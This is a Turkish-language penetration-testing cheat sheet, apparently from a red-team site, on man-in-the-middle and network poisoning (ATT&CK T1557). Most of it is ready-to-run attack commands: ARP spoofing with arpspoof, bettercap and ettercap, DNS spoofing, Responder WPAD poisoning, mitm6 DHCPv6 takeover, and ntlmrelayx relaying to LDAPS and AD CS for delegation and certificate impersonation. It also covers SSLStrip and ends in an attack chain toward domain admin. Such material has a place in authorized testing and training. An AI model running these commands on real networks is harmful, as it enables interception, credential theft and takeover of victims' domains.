MITM & Ağ Zehirleme
ATT&CK T1557 difficulty: orta
Man-in-the-Middle (MITM / AiTM), saldırganın iki taraf arasındaki trafiğe araya girmesidir (T1557). Yerel ağda ARP/DNS zehirleme, WPAD ve IPv6/DHCPv6 suistimali en yaygın yöntemlerdir; NTLM relay ile birleşince kimlik ele geçirmeye döner.
Ön koşullar
Section titled “Ön koşullar”- Kurban ile aynı L2 segment (veya ARP'ye erişim)- IP forwarding; mümkünse ikinci arayüz / TUN- Araçlar: arpspoof, bettercap, ettercap, mitm6, Responder, ntlmrelayx- Üretim etkisi: kesinti riski — kapsam/zamanlamaARP spoofing
Section titled “ARP spoofing”sudo sysctl -w net.ipv4.ip_forward=1sudo sysctl -w net.ipv6.conf.all.forwarding=1sudo arpspoof -i eth0 -t 10.10.10.5 -r 10.10.10.1sudo bettercap -iface eth0> net.probe on> set arp.spoof.targets 10.10.10.5> set arp.spoof.internal true> arp.spoof on> net.sniff onsudo ettercap -T -q -i eth0 -M arp:remote /10.10.10.5// /10.10.10.1//ARP sonrası trafik sende; sniffing veya SSLStrip benzeri modüller (modern HTTPS’te sınırlı) uygulanabilir.
DNS spoofing
Section titled “DNS spoofing”> set dns.spoof.domains login.hedef.local,*.hedef.local> set dns.spoof.address 10.10.10.66> dns.spoof onBirçok Windows istemcisi proxy keşfi için WPAD kullanır. Responder -w ile sahte WPAD sunup NTLM auth isteyebilir:
sudo responder -I eth0 -wFdIPv6 (mitm6) — kurumsal ağda güçlü
Section titled “IPv6 (mitm6) — kurumsal ağda güçlü”Windows istemcileri sıkça IPv6’yı tercih eder; DHCPv6 ile saldırgan kendini DNS olarak atayabilir — LLMNR’den bağımsız çalışır.
-
mitm6 çalıştır — istemcilere sahte DHCPv6 ile DNS ata:
Terminal window sudo mitm6 -d hedef.localTerminal window sudo mitm6 -i eth0 -d hedef.local --ignore-nofqdn -
WPAD / relay ile birleştir — ntlmrelayx IPv6 dinlesin, LDAP(S)’e aktar:
Terminal window sudo ntlmrelayx.py -6 -t ldaps://dc01.hedef.local \-wh attacker.hedef.local --delegate-accessTerminal window sudo ntlmrelayx.py -6 -t http://ca.hedef.local/certsrv/certfnsh.asp \--adcs --template Machine -
Sonuç — makine hesabı kimlikleri, RBCD/delegasyon, sertifika tabanlı kimliğe bürünme, hesap ele geçirme.
ICMP redirect / diğer
Section titled “ICMP redirect / diğer”Trafik kullanımı
Section titled “Trafik kullanımı”sudo tcpdump -i eth0 -w mitm.pcap host 10.10.10.5> set http.proxy.sslstrip true> http.proxy onKomut üreteci
Section titled “Komut üreteci”mitm6 · IPv6
embedded toolsudo mitm6 -i eth0 -d domain.localmitm6 · IPv6
Section titled “mitm6 · IPv6”Saldırı zinciri
Section titled “Saldırı zinciri”ARP spoof kurban ↔ GW → net-creds / pcredz cleartext → veya DNS spoof → phishing portalmitm6 -d hedef.local → ntlmrelayx -6 ldaps --delegate-access → RBCD → DA etkisi